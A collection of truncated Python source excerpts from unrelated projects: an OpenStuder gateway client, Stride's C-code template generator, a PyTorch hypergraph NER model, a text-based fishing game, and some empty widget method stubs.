self.on_properties_found = callbacks.on_properties_found
self.on_property_read = callbacks.on_property_read
self.on_properties_read = callbacks.on_properties_read
self.on_property_written = callbacks.on_property_written
self.on_property_subscribed = callbacks.on_property_subscribed
self.on_properties_subscribed = callbacks.on_properties_subscribed
self.on_property_unsubscribed = callbacks.on_property_unsubscribed
self.on_properties_unsubscribed = callbacks.on_properties_unsubscribed
self.on_property_updated = callbacks.on_property_updated
self.on_datalog_properties_read = callbacks.on_datalog_properties_read
self.on_datalog_read_csv = callbacks.on_datalog_read_csv
self.on_device_message = callbacks.on_device_message
self.on_messages_read = callbacks.on_messages_read
def state(self) -> SIConnectionState:
"""
Returns the current state of the client. See **SIConnectionState** for details.
:return: Current state of the client.
"""
return self.__state
def access_level(self) -> SIAccessLevel:
"""
Return the access level the client has gained on the gateway connected. See **SIAccessLevel** for details.
:return: Access level granted to client.
"""
return self.__access_level
def gateway_version(self) -> str:
"""
Returns the version of the OpenStuder gateway software running on the host the client is connected to.
:return: Version of the gateway software.
"""
return self.__gateway_version
def enumerate(self) -> None:
"""
Instructs the gateway to scan every configured and functional device access driver for new devices and remove devices that do not respond anymore.
The status of the operation and the number of devices present are reported using the on_enumerated() callback.
:raises SIProtocolError: If the client is not connected or not yet authorized.
"""
# Ensure that the client is in the CONNECTED state.
self.__ensure_in_state(SIConnectionState.CONNECTED)
# Encode and send ENUMERATE message to gateway.
self.__ws.send(super(SIAsyncGatewayClient, self).encode_enumerate_frame())
def describe(self, device_access_id: str = None, device_id: str = None, property_id: int = None, flags: SIDescriptionFlags = None) -> None:
"""
This method can be used to retrieve information about the available devices and their properties from the connected gateway. Using the optional device_access_id,
device_id and property_id parameters, the method can either request information about the whole topology, a particular device access instance, a device or a property.
The flags control the level of detail in the gateway's response.
The description is reported using the on_description() callback.
:param device_access_id: Device access ID for which the description should be retrieved.
:param device_id: Device ID for which the description should be retrieved. Note that device_access_id must be present too.
:param property_id: Property ID for which the description should be retrieved. Note that device_access_id and device_id must be present too.
:param flags: Flags to control level of detail of the response.
:raises SIProtocolError: If the client is not connected or not yet authorized.
"""
# Ensure that the client is in the CONNECTED state.
self.__ensure_in_state(SIConnectionState.CONNECTED)
# Encode and send DESCRIBE message to gateway.
self.__ws.send(super(SIAsyncGatewayClient, self).encode_describe_frame(device_access_id, device_id, property_id, flags))
def find_properties(self, property_id: str) -> | |
<reponame>Stride-Language/Stride<filename>strideroot/library/1.0/python/BaseCTemplate.py
# -*- coding: utf-8 -*-
"""
Stride is licensed under the terms of the 3-clause BSD license.
Copyright (C) 2017. The Regents of the University of California.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
Authors: <NAME> and <NAME>
"""
from __future__ import print_function
try:
unicode_exists_test = type('a') == unicode
except:
unicode = str # for python 3
import re
class BaseCTemplate(object):
def __init__(self):
self.properties = {}
self.included = [] # Accumulates include statements
self.rate_stack = []
self.rate_nested = 0
self.rate_counter = 0
self.domain_rate = None
self.str_true = "true"
self.str_false = "false"
self.stream_begin_code = '// Starting stream %02i -------------------------\n ' #{\n'
# self.stream_end_code = '} // Stream End %02i\n'
self.stream_end_code = '// Stream End %02i'
self.string_type = "std::string"
self.real_type = 'float'
self.real_postfix = 'f'
self.bool_type = 'bool'
self.int_type = 'int'
# Internal templates
self.str_rate_begin_code = '{ // Start new rate %f old: %f\n'
self.str_rate_end_code = '\n} // Close Rate %i\n'
self.str_assignment = '%s = %s;\n'
self.str_increment = '%s += %s;\n'
self.str_module_declaration = '''
class %s {
public:
%s
%s(%s) {
%s
}
%s
};
'''
self.str_function_declaration = '''%s %s(%s) {
%s
}
'''
self.str_while_declaration = '''while (%s) {
%s
}
'''
pass
def process_code(self, code):
''' This function should be overridden to do text replacement for hardware properties '''
return code
def source_marker(self, line, filename):
if line == -1:
marker = ''
else:
marker = "//#line " + str(line) + ' "' + filename + '"\n'
return marker
def number_to_string(self, number):
if type(number) == int:
s = '%i;\n'%number
elif type(number) == float:
s = '%.8f;'%number
else:
raise ValueError(u"Unsupported type '%s' in assignment."%type(number).__name__)
return s;
def get_platform_initialization_code(self, code, token_names, num_inputs, out_tokens, bundle_index = -1):
p = re.compile("%%intoken:[a-zA-Z0-9_]+%%") ## TODO tweak this better
matches = p.findall(code)
if num_inputs > 0: # has inputs
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for match in matches:
index = int(match[match.rfind(":") + 1:-2])
code = code.replace(match, token_names[index])
code = code.replace('%%bundle_index%%', str(bundle_index))
else: # Output only
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for token in out_tokens:
code = code.replace('%%token%%', token)
return code
def get_platform_preprocessing_code(self, code, token_names, num_inputs, out_tokens, bundle_index = -1):
p = re.compile("%%intoken:[a-zA-Z0-9_]+%%") ## TODO tweak this better
matches = p.findall(code)
if num_inputs > 0: # has inputs
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for match in matches:
index = int(match[match.rfind(":") + 1:-2])
code = code.replace(match, token_names[index])
code = code.replace('%%bundle_index%%', str(bundle_index))
else: # Output only
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for token in out_tokens:
code = code.replace('%%token%%', token)
return code
def get_platform_postprocessing_code(self, code, token_names, num_inputs, out_tokens, bundle_index = -1):
p = re.compile("%%intoken:[a-zA-Z0-9_]+%%") ## TODO tweak this better
matches = p.findall(code)
if num_inputs > 0: # has inputs
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for match in matches:
index = int(match[match.rfind(":") + 1:-2])
code = code.replace(match, token_names[index])
code = code.replace('%%bundle_index%%', str(bundle_index))
else: # Output only
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for token in out_tokens:
code = code.replace('%%token%%', token)
return code
def get_platform_inline_processing_code(self, code, token_names, num_inputs, num_outputs, bundle_index = -1):
p = re.compile("%%intoken:[a-zA-Z0-9_]+%%") ## TODO tweak this better
matches = p.findall(code)
if num_inputs > 0: # has inputs
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for match in matches:
index = int(match[match.rfind(":") + 1:-2])
code = code.replace(match, token_names[index])
code = code.replace('%%bundle_index%%', str(bundle_index))
else: # Output only
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
return code
def get_platform_processing_code(self, code, token_names, handle, num_inputs, num_outputs, bundle_index = -1, prop_tokens = {}):
code = self.get_platform_inline_processing_code(code, token_names, num_inputs, num_outputs,
bundle_index, prop_tokens)
if num_outputs > 0:
code = code.replace('%%token%%', handle)
return code
def declaration_bundle_real(self, name, size, close=True):
declaration = self.real_type + " %s[%i]"%(name, size)
if close:
declaration += ';\n'
return declaration
def declaration_bundle_int(self, name, size, close=True):
declaration = self.int_type + " %s[%i]"%(name, size)
if close:
declaration += ';\n'
return declaration
def declaration_bundle_bool(self, name, size, close=True):
declaration = self.bool_type + " %s[%i]"%(name, size)
if close:
declaration += ';\n'
return declaration
def declaration_bundle_string(self, name, size, close=True):
declaration = self.string_type + " %s[%i]"%(name, size)
if close:
declaration += ';\n'
return declaration
def declaration(self, block, close=True):
declaration = ''
vartype = self.get_block_type(block)
if 'block' in block:
block = block['block']
elif 'blockbundle' in block:
block = block['blockbundle']
name = block['name']
if 'size' in block:
if vartype == 'real':
declaration = self.declaration_bundle_real(name, block['size'], close)
elif vartype == 'string':
declaration = self.declaration_bundle_string(name, block['size'],close)
elif vartype == 'bool':
declaration = self.declaration_bundle_bool(name, block['size'],close)
elif vartype == 'int':
declaration = self.declaration_bundle_int(name, block['size'],close)
else:
if vartype == 'real':
declaration = self.declaration_real(name, close)
elif vartype == 'string':
declaration = self.declaration_string(name, close)
elif vartype == 'bool':
declaration = self.declaration_bool(name, close)
elif vartype == 'int':
declaration = self.declaration_int(name, close)
return declaration
def declaration_reference(self, block, close=True):
declaration = ''
vartype = self.get_block_type(block)
name = block['name']
if 'size' in block:
if vartype == 'real':
declaration = self.declaration_bundle_real(name, block['size'], close)
elif vartype == 'string':
declaration = self.declaration_bundle_string(name, block['size'],close)
elif vartype == 'bool':
declaration = self.declaration_bundle_bool(name, block['size'],close)
elif vartype == 'int':
declaration = self.declaration_bundle_int(name, block['size'],close)
else:
name = "&" + name
if vartype == 'real':
declaration = self.declaration_real(name, close)
elif vartype == 'string':
declaration = self.declaration_string(name, close)
elif vartype == 'bool':
declaration = self.declaration_bool(name, close)
elif vartype == 'int':
declaration = self.declaration_int(name, close)
return declaration
def declaration_reference_from_instance(self, instance, close=True):
declaration = ''
vartype = instance.get_type()
name = instance.get_name()
# FIXME support bundles
if vartype == 'bundle':
vartype = instance.get_bundle_type()
if vartype == 'real':
declaration = self.declaration_real(name, close)
elif vartype == 'string':
declaration = self.declaration_string(name, close)
elif vartype == 'bool':
declaration = self.declaration_bool(name, close)
elif vartype == 'int':
declaration = self.declaration_int(name, close)
declaration = self.bundle_indexing(declaration, instance.get_size())
else:
name = "&" + name
if vartype == 'real':
declaration = self.declaration_real(name, close)
elif vartype == 'string':
declaration = self.declaration_string(name, close)
elif vartype == 'bool':
declaration = self.declaration_bool(name, close)
elif vartype == 'int':
declaration = self.declaration_int(name, close)
else:
print("Unsupported type for reference:" + vartype)
return declaration
def declaration_real(self, name, close=True, default = None):
declaration = self.real_type + " " + name
if default:
declaration += ' = ' + str(default)
if close:
declaration += ';\n'
return declaration
def declaration_int(self, name, close=True, default = None):
declaration = self.int_type + " " + name
if default:
declaration += ' = ' + str(default)
if close:
declaration += ';\n'
return declaration
def declaration_bool(self, name, close=True, default = None):
declaration = self.bool_type + " " + name
if default:
declaration += ' = ' + str(default)
if close:
declaration += ';\n'
return declaration
def declaration_string(self, name, close=True, default = None):
declaration = self.string_type + " " + name
if default:
declaration += ' = ' + str(default)
if close:
declaration += ';\n'
return declaration
def declaration_module(self, moduletype, handle, instance_consts = [], | |
<filename>module/Hypergraph.py
"""
Pytorch implemenation of Hypergraph
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from typing import Dict, List
from torch.autograd import Variable
from collections import defaultdict
import pdb
def to_scalar(var):
# returns a python float
return var.view(-1).data.tolist()[0]
def argmax(vec):
# vec is only 1d vec
# return the argmax as a python int
_, idx = torch.max(vec, 0)
return to_scalar(idx)
def create_empty_var(if_gpu):
if if_gpu:
loss = Variable(torch.Tensor([0]).cuda())
else:
loss = Variable(torch.Tensor([0]))
return loss
def log_sum_exp(vec_list):
"""
Compute log sum exp in a numerically stable way for the forward algorithm
vec is n * m, norm in row
return n * 1
"""
if type(vec_list) == list:
mat = torch.stack(vec_list, 1)
else:
mat = vec_list
row, column = mat.size()
ret_l = []
for i in range(row):
vec = mat[i]
max_score = vec[argmax(vec)]
max_score_broadcast = max_score.view(-1).expand(1, vec.size()[0])
ret_l.append(max_score + \
torch.log(torch.sum(torch.exp(vec - max_score_broadcast))))
return torch.cat(ret_l, 0)
def log_sum_exp_t(vec_A, vec_B, vec_C):
"""
vec_size: batch_size * label_size
"""
batch_size, label_size = vec_A.size()
vec_A = vec_A.view(-1, 1).squeeze(1)
vec_B = vec_B.view(-1, 1).squeeze(1)
vec_C = vec_C.view(-1, 1).squeeze(1)
vec_D = log_sum_exp([vec_A, vec_B, vec_C])
return vec_D.view(batch_size, label_size)
def log_sum_exp_b(vec_A, vec_B):
"""
vec_size: batch_size * label_size
"""
batch_size, label_size = vec_A.size()
vec_A = vec_A.view(-1, 1).squeeze(1)
vec_B = vec_B.view(-1, 1).squeeze(1)
vec_D = log_sum_exp([vec_A, vec_B])
return vec_D.view(batch_size, label_size)
class Hypergraph(nn.Module):
"""
Naive implementaion would be every instance is paired with partial tree structure.
But padding would be a problme then.
For consideration of efficiency, hypergraph is computed in batch mode.
The representation of hypergraph is A, E, T, I, X
"""
def __init__(self,
config) -> None:
super(Hypergraph, self).__init__()
self.config = config
self.label_size = config.label_size
self.C = config.C
self.hidden_size = config.semi_hidden_size
self.if_margin = config.if_margin
self.beta = config.beta
self.II_lin = nn.Linear(config.f_hidden_size * 4, self.label_size)
self.TX_lin = nn.Linear(config.f_hidden_size * 2, self.label_size)
self.IX_lin = nn.Linear(self.hidden_size * 2, self.label_size)
self.TI_lin = nn.Linear(config.f_hidden_size * 2, self.label_size)
self.f_cell = nn.LSTMCell(config.f_hidden_size * 2, config.semi_hidden_size)
self.b_cell = nn.LSTMCell(config.f_hidden_size * 2, config.semi_hidden_size)
def _gen_TX_batch(self, inputs, entity_batch):
batch_size, sent_len, feat_dim = inputs.size()
null_batch = torch.ones(batch_size, sent_len, self.label_size)
for i in range(batch_size):
for start, end, label in entity_batch[i]:
null_batch[i, start, label] = 0
ret_var = Variable(null_batch)
if self.config.if_gpu:
ret_var = ret_var.cuda()
return ret_var
def _gen_II_batch(self, inputs, entity_batch):
"""
only overlapping mentions with the same type have this kind of feature
"""
batch_size, sent_len, feat_dim = inputs.size()
if sent_len == 1:
return None
II_batch = torch.zeros(batch_size, sent_len - 1, self.label_size)
for i in range(batch_size):
start_dic = defaultdict(list)
for start, end, label in entity_batch[i]:
start_dic[(start, label)].append(end)
for (start, label), end_list in start_dic.items():
if len(end_list) > 0:
min_i = min(end_list)
max_i = max(end_list)
for j in range(start, max_i):
# It could be more than 1
II_batch[i, j, label] += 1
ret_var = Variable(II_batch)
if self.config.if_gpu:
ret_var = ret_var.cuda()
return ret_var
def _gen_TI_batch(self, inputs, entity_batch):
batch_size, sent_len, feat_dim = inputs.size()
TI_batch = torch.zeros(batch_size, sent_len, self.label_size)
for i in range(batch_size):
start_dic = defaultdict(list)
for start, end, label in entity_batch[i]:
start_dic[(start, label)].append(end)
for (start, label), end_list in start_dic.items():
TI_batch[i, start, label] = 1
ret_var = Variable(TI_batch)
if self.config.if_gpu:
ret_var = ret_var.cuda()
return ret_var
def _filter_entity(self, inputs, entity_batch):
batch_size, sent_len, feat_dim = inputs.size()
ret_l = []
for i in range(batch_size):
sent_ents = []
for start, end, label in entity_batch[i]:
if end + 1 - start <= self.C:
sent_ents.append((start, end, label))
ret_l.append(sent_ents)
return ret_l
def _marginize(self, TI_scores, TX_scores, entity_batch):
"""
Add softmax margin
"""
batch_size, sent_len, label_size = TI_scores.size()
FP_mat = torch.zeros(batch_size, sent_len, label_size)
FN_mat = torch.zeros(batch_size, sent_len, label_size)
for b in range(batch_size):
for i in range(sent_len):
for k in range(label_size):
bool_TX = True
for j in range(i, sent_len):
if (i, j, k) in entity_batch[b]:
bool_TX = False
if bool_TX:
FP_mat[b,i,k] = 1
else:
FN_mat[b,i,k] = self.beta
FP_var = Variable(FP_mat)
FN_var = Variable(FN_mat)
if self.config.if_gpu:
FP_var = FP_var.cuda()
FN_var = FN_var.cuda()
TI_scores = TI_scores + FP_var
TX_scores = TX_scores + FN_var
return TI_scores, TX_scores
def forward(self,
inputs: torch.FloatTensor,
entity_batch: List) -> Dict[str, torch.Tensor]:
"""
inputs: matrix with size: batch_size * sent_len * feat_dim
entities: list of (start, end, label)
Output dictionary contains:
expectation: the expected value of partition function in log space
loss: if chunks is given
"""
output = {}
batch_size, sent_len, feat_dim = inputs.size()
if self.config.if_C:
entity_batch = self._filter_entity(inputs, entity_batch)
TX_scores = self.TX_lin(inputs)
TX_batch_mask = self._gen_TX_batch(inputs, entity_batch)
TX_ner_scores = torch.mul(TX_scores, TX_batch_mask).sum(1).sum(1)
ner_scores = TX_ner_scores
span_vectors = self._gen_seg_mat(inputs)
IX_scores = self.IX_lin(span_vectors)
IX_ner_scores = self.score_chunk(IX_scores, entity_batch)
ner_scores = ner_scores + IX_ner_scores
TI_scores = self.TI_lin(inputs)
TI_batch_mask = self._gen_TI_batch(inputs, entity_batch)
TI_ner_scores = torch.mul(TI_scores, TI_batch_mask).sum(1).sum(1)
ner_scores = ner_scores + TI_ner_scores
if sent_len > 1:
II_list = []
for pos in range(sent_len - 1):
II_pos = self.II_lin(torch.cat([inputs[:, pos], inputs[:, pos + 1]], 1)) # batch_size * 1
II_list.append(II_pos)
II_scores = torch.stack(II_list, 1) # batch_size * sent_len - 1 * label_size
II_batch_mask = self._gen_II_batch(inputs, entity_batch)
II_ner_scores = torch.mul(II_scores, II_batch_mask).sum(1).sum(1)
ner_scores = ner_scores + II_ner_scores
else:
II_scores = None
#TODO: TI constrain
if self.if_margin:
TI_scores, TX_scores = self._marginize(TI_scores, TX_scores, entity_batch)
TX_scores = TX_scores.transpose(0, 1).contiguous()
if II_scores is not None:
II_scores = II_scores.transpose(0, 1).contiguous()
if TI_scores is not None:
TI_scores = TI_scores.transpose(0, 1).contiguous()
inside_score = self.inside(IX_scores, TX_scores, II_scores, TI_scores)
assert inside_score.size() == ner_scores.size()
output["expectation"] = inside_score
# negative log-likelihood
loss_vec = (inside_score - ner_scores)
output["loss"] = loss_vec.mean()
# loss could be negative if we restrict the max length
loss_vec_relu = F.relu(loss_vec)
diff = (loss_vec_relu - loss_vec).max().cpu().data[0]
# if diff > 1e-4: # arould singel precision
if output["loss"].cpu().data[0] < 0:
# pdb.set_trace()
output["loss"] = loss_vec_relu.mean()
print("Nega loss! diff {0} with length {1}".format(diff, sent_len))
return output
def inside(self,
IX_scores: torch.FloatTensor,
TX_scores: torch.FloatTensor,
II_scores: torch.FloatTensor,
TI_scores: torch.FloatTensor) -> torch.FloatTensor:
"""
:param
IX_scores: sent_len * sent_len * batch_size * label_size
TX_scores: sent_len * batch_size * label_size
II_scores: sent_len - 1 * batch_size * label_size
:return: Z
"""
sent_len, sent_len, batch_size, label_size = IX_scores.size()
if sent_len == 1:
if TI_scores is None:
return log_sum_exp_b(IX_scores[0,0], TX_scores[0]).sum(1)
else:
return log_sum_exp_b(IX_scores[0,0] + TI_scores[0], TX_scores[0]).sum(1)
score_list = []
for i in range(sent_len):
if self.config.if_C:
outlier = min(i + self.C - 1, sent_len - 1)
else:
outlier = sent_len - 1
pre_vec = IX_scores[i, outlier]
for j in reversed(range(i, outlier)):
# pdb.set_trace()
vec_A = pre_vec + II_scores[j]
vec_B = IX_scores[i, j]
vec_C = vec_A + vec_B
# merged_ = log_sum_exp_t(vec_A, vec_B, vec_C)
merged_v = torch.stack([vec_A, vec_B, vec_C], 2)
merged = (merged_v - F.log_softmax(merged_v, dim=2)).mean(2)
pre_vec = merged
ent_vec = pre_vec
ent_vec = ent_vec + TI_scores[i]
# final_vec_ = log_sum_exp_b(ent_vec, null_scores[i])
final_vec = torch.stack([ent_vec, TX_scores[i]], 2) # batch_size * label_size * 2
merged_final_vec = (final_vec - F.log_softmax(final_vec, dim=2)).mean(2) # batch_size * label_size
# pdb.set_trace()
score_list.append(merged_final_vec.sum(1)) # batch_size
score_mat = torch.stack(score_list, 1) # batch_size * sent_len
overall_score = score_mat.sum(1)
# overall_score = sum(score_list)
return overall_score
def outside(self,
inputs: torch.FloatTensor) -> torch.FloatTensor:
"""
for sanity check
"""
pass
def score_chunk(self,
IX_scores: torch.FloatTensor,
entity_batch: List) -> torch.Tensor:
sent_len, sent_len, batch_size, label_size = IX_scores.size()
gold_score = []
for i in range(batch_size):
entities = entity_batch[i]
a_score = create_empty_var(self.config.if_gpu)
for start, end, label in entities:
a_score += IX_scores[start, end, i, label]
gold_score.append(a_score)
return torch.cat(gold_score, 0)
def decode(self,
inputs: torch.FloatTensor) -> List:
"""
:param inputs: matrix of embeddings
:return: partial overlapping structure
The main purpose of decoding is not for metrics, but for interpretation
"""
batch_size, sent_len, feat_dim = inputs.size()
II_list = []
for pos in range(sent_len - 1):
II_pos = self.II_lin(torch.cat([inputs[:, pos], inputs[:, pos + 1]], 1)) # batch_size * 1
II_list.append(II_pos)
if len(II_list) != 0:
II_scores = torch.stack(II_list, 0) # sent_len - 1 * batch_size * label_size
IX_vectors = self._gen_seg_mat(inputs) # sent_len * sent_len * batch_size * feat_dim
IX_scores = self.IX_lin(IX_vectors)
TX_scores = self.TX_lin(inputs) # batch_size * sent_len * feat_dim
TI_scores = self.TI_lin(inputs)
ret_list = []
for i in range(batch_size):
entity_list = []
for j in range(sent_len):
for k in range(self.config.label_size):
if self.config.if_C:
outlier = min(j + self.C - 1, sent_len - 1)
else:
outlier = sent_len - 1
def recur_find(s):
if s == outlier:
return IX_scores[j, s, i, k], [s]
best_value, best_ends = recur_find(s+1)
| |
import numpy as np
import random
import time
from libdw import sm
#Defining the class Rod, which encompasses functions that all rods/fish catching equipment have
class Rod:
#n represents the number of fish caught a time by the type of rod, default value is 1
n = 1
#defines an attribute .chance, which is the probability of catching each type of fish, specific to each rod
def __init__(self):
self.chance = [1]*self.stat1 + [2]*self.stat2 + [3]*self.stat3 + [4]*self.stat4
#main function called to start fishing in the game, which also calls upon another function catch_fish
def startfishing(self):
n = self.n
timer = random.randint(3,5)
print("\n\tFishing... Patience is key.")
time.sleep(timer)
print("\t!!!!!")
start = time.time()
fishnames, fishlengths = self.catch_fish()
input("\tQuick! Press ENTER to catch the fish!\n")
end = time.time()
duration = round(end-start,1)
#function checks for the time it takes for player to react to the fishing prompt
#if player takes longer than 1.5 seconds to enter an input, the fish is not caught
if duration <= 1.5:
for i in range(n):
print("\n\tWoah! You caught a {}! It's {}cm long.".format(fishnames[i],fishlengths[i]))
user.fishlist += "\n\t" + fishnames[i] + " - " + str(fishlengths[i]) + "cm"
user.fishcount.append(fishlengths[i])
user.fishdict[fishnames[i]] += 1
if fishlengths[i] > user.largest:
user.largest = fishlengths[i]
user.fishdict["Largest Fish You Ever Caught"] = str(user.largest) + " cm"
else:
print("\n\tAww, it escaped.\n")
# def catch_fish(self, self.n=1):
def catch_fish(self):
n = self.n
probability = self.chance
fishnames = []
fishlengths = []
#this function randomly chooses one type of fish to be caught out of the four.
#the length of the type of fish caught is also randomly generated, with a specific range for each type.
for i in range(n):
fish = random.choice(probability)
if fish == 1:
fishname = "Guppy"
fishlength = random.randint(3,6)
elif fish == 2:
fishname = "S<NAME>"
fishlength = random.randint(10,60)
elif fish == 3:
fishname = "King Salmon"
fishlength = random.randint(80,170)
elif fish == 4:
fishname = "Giant Magikarp??"
fishlength = random.randint(200,450)
fishnames.append(fishname)
fishlengths.append(fishlength)
#the steps below add on to the player's fishing history/statistics for every fish he catches
# user.fishdict[fishname] += 1
# if fishlength > user.largest:
# user.largest = fishlength
# user.fishdict["Largest Fish You Ever Caught"] = str(user.largest) + " cm"
return fishnames, fishlengths
#CLASS INHERITANCE of Rod in different types of rods within the game
#Defining stat1, stat2, stat3 and stat4 for each type of rod allows for customisation
#of fishing probability for each rod, with the probability being higher for 'better quality'
#or more expensive fish as the upgrade becomes higher
class OldRod(Rod):
"""
STARTER ROD
probability of getting 1: 50%,
probability of getting 2: 30%,
probability of getting 3: 15%,
probability of getting 4: 5%
"""
stat1 = 50
stat2 = 30
stat3 = 15
stat4 = 5
class NewerRod(Rod):
"""
probability of getting 1: 20%,
probability of getting 2: 40%,
probability of getting 3: 30%,
probability of getting 4: 10%
"""
stat1 = 20
stat2 = 40
stat3 = 30
stat4 = 10
class SuperRod5000(Rod):
"""
OP ROD
probability of getting 1: 10%
probability of getting 2: 15%
probability of getting 3: 30%
probability of getting 4: 45%
"""
stat1 = 10
stat2 = 15
stat3 = 30
stat4 = 45
#This is a special type of rod, the Fishing Net
#the player does not own this rod, instead, it is a single-use purchasable tool/add-on in the game
#here, n has been defined as 5 as the fishing net can catch 5 fishes for each time the user uses it
#the fishing net is also a rod since it uses the same functions catch_fish and start_fishing
class FishingNet(Rod):
"""
catches 5 fish in a row, 1 time usage, probability is buffed
probability of getting 1: 20%
probability of getting 2: 20%
probability of getting 3: 30%
probability of getting 4: 30%
"""
stat1 = 20
stat2 = 20
stat3 = 30
stat4 = 30
n = 5
#Object instantiation for the rods used in the game
#this allows the rod's functions to be callable within the state machine and by the Player object
oldrod = OldRod()
newerrod = NewerRod()
superrod = SuperRod5000()
fishingnet = FishingNet()
#Defining the Player class - this class creates an object called the Player, which encompasses
#common attributes used and accessed by the user in the game
class Player:
name = "John"
#This is the fish dictionary, it keeps track of total no. of each type of fish caught
#by the player throughout the entire game, as well as the longest fish ever caught
fishdict = {
"Guppy" : 0,
"Saba Fish" : 0,
"King Salmon" : 0,
"Giant Magikarp??" : 0,
"Largest Fish You Ever Caught" : ""
}
#rod list is a list of the rods that can be owned/used by the user/player
rodlist = [oldrod, newerrod, superrod]
#net = "OFF" and netcount = 0 defines the default state whereby the player does not own any nets at the start of the game
#therefore the player is not allowed to use any nets
net = "OFF"
netcount = 0
#an arbitrary value set to start storing the largest length of fish caught
largest = 1
#When player starts the game, he has no fishes, $0 and starts with the starter rod, Old Rod.
def __init__(self):
self.fishcount = []
self.fishlist = ""
self.coins = 0
self.rod = self.rodlist[0]
#A function that is called when user wants to check how much money he has
def get_coins(self):
print("\n\tWow, you have ${} right now.\n".format(self.coins))
return self.coins
#The function called when user wants to check how many fishes he has currently
def my_fishes(self):
if self.fishlist == "":
print("\n\tYou don't have any fishes right now.\n")
else:
print(self.fishlist)
#Function called when user wants to sell the fishes he has on him currently
def sell_fishes(self):
#catches the scenario where the user has no fish to sell, returns him back to previous action
if self.fishcount == []:
print("\n\tHey, who are you trying to kid? You haven't fished anything to sell!\n")
return
total_lengths = sum(self.fishcount)
#profit = total length of fishes he has caught (in cm) x Market rate for fishes ($0.50 per cm)
profit = total_lengths * 0.50
self.coins += profit
#fishcount and fishlist is reset everytime he makes a sale
self.fishcount = []
self.fishlist = ""
print("""
What a sale! You've earned ${}!
You now have ${} in total.
Keep working hard :)
""".format(profit,self.coins))
#Function called when user wants to purchase some single-use fishing nets to use in game
def buy_nets(self):
print("""
So you want to buy some fishing nets? Sure!
Let me explain how to use them again:
Each fishing net catches you five fishes at one time, and can only be used once, with:
probability of getting Guppy: {0}%,
probability of getting Saba Fish: {1}%,
probability of getting Norweigian Salmon: {2}%,
probability of getting Giant Magikarp??: {3}%
After purchasing fishing nets, the option to enter 'N' will appear when you are FISHING.
Enter 'N' each time to use the fishing net(s) you have purchased.
Once all fishing nets purchased have been used up, you will no longer be given the option 'N'.
Price of 1 fishing net: $20
How many would you like to buy?
Enter "None" if you'd like to cancel your purchase.
""".format(fishingnet.stat1,fishingnet.stat2,fishingnet.stat3,fishingnet.stat4))
ans = input(">>>")
#This allows for the user to go back to his previous action if he changes his mind
#and doesn't want to buy a net anymore
if ans == "None":
return
#this catches the error whereby the string input by the user is not an integer and cannot be converted to integer type,
#hence preventing an error that crashes the game
try:
int(ans)
except:
print("\n\tThat's an invalid number! Please try again :)\n")
self.buy_nets()
else:
#checks amount of money user has
balance = self.coins
ans = int(ans)
#check if his amount of money is sufficient
if balance >= ans*20:
self.net = "ON"
self.coins = self.coins - ans*20
self.netcount += ans
print("""
Thank you for your payment!
You have purchased {0} fishing nets.
Your current coin balance is: ${1}.
""".format(int(ans),self.coins))
#else, the transaction does not go through and user is sent back to previous action
else:
print("""
Oh no! You don't have enough money.
Your current coin balance is: ${}.
Please purchase lesser nets OR come back when you have more :)
""".format(self.coins))
return
#Function called when player would like to upgrade his current fishing rod
def upgrade_rod(self):
"""
PRICELIST:
NEWER ROD: requires $100
SUPER ROD 5000: requires $1000
"""
namelist = ["Newer Rod","SUPER ROD 5000"]
pricelist = [100,1000]
index = self.rodlist.index(self.rod)
#Catches the scenario where the player has upgraded to the best rod and it cannot be upgraded further
if index == 2:
print("\n\tSorry! You've reached your maximum upgrade :)\n")
return
balance = self.coins
print("""
Yay! Time to upgrade your rod!
Your next available rod is: {0}!
probability of getting Guppy: {1}%,
probability of getting Saba Fish: {2}%,
probability of getting Norweigian Salmon: {3}%,
probability of getting Giant Magikarp??: {4}%
COST: ${5}
Your previous rod (Old Rod)'s specifications:
probability of getting Guppy: {6}%,
probability of getting Saba Fish: {7}%,
probability of getting Norweigian Salmon: {8}%,
probability of getting Giant Magikarp??: {9}%
Would you like to upgrade? Y/N
""".format(namelist[index],self.rodlist[index+1].stat1,self.rodlist[index+1].stat2,self.rodlist[index+1].stat3,self.rodlist[index+1].stat4,pricelist[index],self.rodlist[index].stat1,self.rodlist[index].stat2,self.rodlist[index].stat3,self.rodlist[index].stat4))
#Player decides whether or not to upgrade
key = input(">>>")
if key == "Y":
#checks if player has enough money to upgrade his rod
if balance >= pricelist[index]:
self.rod = | |
def visibleRegion(*args, **kwargs):
pass
def whatsThis(*args, **kwargs):
pass
def wheelEvent(*args, **kwargs):
pass
